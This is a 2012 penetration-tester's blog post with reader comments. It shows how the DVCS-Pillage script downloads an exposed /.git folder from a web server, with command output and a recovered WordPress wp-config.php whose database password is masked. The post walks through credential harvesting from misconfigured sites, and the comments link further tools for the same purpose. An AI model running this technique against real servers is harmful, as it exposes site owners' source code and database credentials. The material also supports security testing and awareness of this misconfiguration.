Monday, October 22, 2012

.git you some with DVCS-Pillage


Ron over at SkullSecurity put out a post on  Using "Git Clone" to get Pwn3D

Worth a read if you havent.  Unfortunately the key to his post relied on wget and directory listings making it possible to download everything in the /.git/* folders.

unfortunately(?) I dont run into this too often. What i do see is the presence of the /.git/ folder sometimes the config or index files it there but certainly no way to know what's in the object folders (where the good stuff lives)[or so i thought].

So i posed the following to twitter

to which i got two great replies.


The first one pointed me to:
https://github.com/evilpacket/DVCS-Pillage
(thanks Kos)

and the second was a shortcut to using the tool by the author (thanks Adam)

DVCS is pretty handy.  With it you can pillage accessible GIT, GS and BZR repos.  Similar functionality for svn already exists in metasploit 

Does it work?  yes mostly...an example:

user@ubuntu:~/pentest/DVCS-Pillage$ ./gitpillage.sh www.site.com/.git/
Initialized empty Git repository in /home/user/pentest/DVCS-Pillage/www.site.com/.git/
Getting refs/heads/master
Getting objects/ef/72174d7a5d893XXXXXXXXXXXXXXXXXXXX
Getting index
Getting .gitignore
curl: (22) The requested URL returned error: 404
About to make 245 requests to www.site.com; This could take a while
Do you want to continue? (y/n)y
Getting objects/01/f0d130adf04d66XXXXXXXXXXXXXXXX9e4ddb41
Getting objects/49/403ecc2d8a343da9XXXXXXXXXXXXXXX3f094d9
Getting objects/d3/1195ab0e695f8b89XXXXXXXXXXXXXXXXXa3af5
Getting objects/f9/b926f07XXXXXXXXXXXXXXXXXXXX567cf438c6a
Getting objects/57/78a12e2edebXXXXXXXXXXXXXXXXXXX3f3a0e8d
---snip---
trying to checkout files
error: git checkout-index: unable to read sha1 file of wp-register.php (caad4f2b21c37bXXXXXXXXXXXXXXX81c7949ec4f74e)


#### Potentially Interesting Files ####


wp-admin/export.php - [CHECKED OUT]
wp-admin/includes/export.php - [CHECKED OUT]
wp-admin/setup-config.php - [CHECKED OUT]
wp-config-sample.php - [CHECKED OUT]
wp-config.php - [CHECKED OUT]
wp-settings.php - [CHECKED OUT]


anything useful in there?

user@ubuntu:~/pentest/DVCS-Pillage/www.site.com$ more wp-config.php
/**
 * The base configurations of the WordPress.
 *
 * This file has the following configurations: MySQL settings, Table Prefix,
 * Secret Keys, WordPress Language, and ABSPATH. You can find more information b
y
 * visiting {@link http://codex.wordpress.org/Editing_wp-config.php Editing
 * wp-config.php} Codex page. You can get the MySQL settings from your web host.
 *
 * This file is used by the wp-config.php creation script during the
 * installation. You don't have to use the web site, you can just copy this file
 * to "wp-config.php" and fill in the values.
 *
 * @package WordPress
 */

// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define('DB_NAME', 'site_wordpress');

/** MySQL database username */
define('DB_USER', 'site_wp');

/** MySQL database password */
define('DB_PASSWORD', 'XXXXXXXX');


another way to turn a low to pwned :-)
CG

3 comments:

Ron said...

Sweet! Somebody mentioned that tool in a comment on my post about /.git. I've run into /.git in the wild with directly listings before, but you're right, it's pretty rare.

CG said...

saw this on twitter

available but not in trunk

http://dev.metasploit.com/redmine/issues/6528

didnt compare results yet

kost said...

I've made my own for which I had 100% success in downloading all the objects and it is doing it pretty quickly due to usage of git fsck trick. Read this blog post:
http://k0st.wordpress.com/2012/10/23/rip-or-pillage-dvcs-story-about-git/

And tool is available here:
https://github.com/kost/dvcs-ripper